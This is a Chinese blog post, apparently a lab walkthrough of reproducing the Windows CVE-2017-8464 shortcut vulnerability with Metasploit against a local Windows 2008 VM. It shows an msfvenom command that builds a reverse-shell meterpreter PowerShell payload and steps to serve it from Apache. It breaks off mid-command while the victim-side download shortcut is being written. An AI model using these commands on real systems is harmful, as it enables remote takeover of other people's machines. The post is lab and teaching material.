MSF之CVE-2017-8464远程命令执行漏洞复现

本文档详细介绍了如何复现CVE-2017-8464漏洞,利用Kali Linux上的msfconsole工具生成payload,并通过Apache服务器将恶意powershell脚本传送给Windows 2008目标系统,最终实现远程命令执行和权限提升。
摘要由CSDN通过智能技术生成

MSF之CVE-2017-8464远程命令执行漏洞复现

准备

实验准备环境:
被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107
攻击机:kali系统,其IP为:192.168.1.111
攻击工具:kali自带的msfconsole工具

漏洞利用

在kali终端中输入msfconsole

cd 下载/
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 -f psh-reflection>hack.ps1

在这里插入图片描述

  1. 将文件拷贝进入/var/www/html
    mv hack.ps1 /var/www/html
  2. 开启apache
    service apache2 start
  3. 访问Apache的hacjk.ps1,显示文件页面

在这里插入图片描述

  1. 在靶机上创建powershell远程快捷方式
    powershell -windowstyl
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值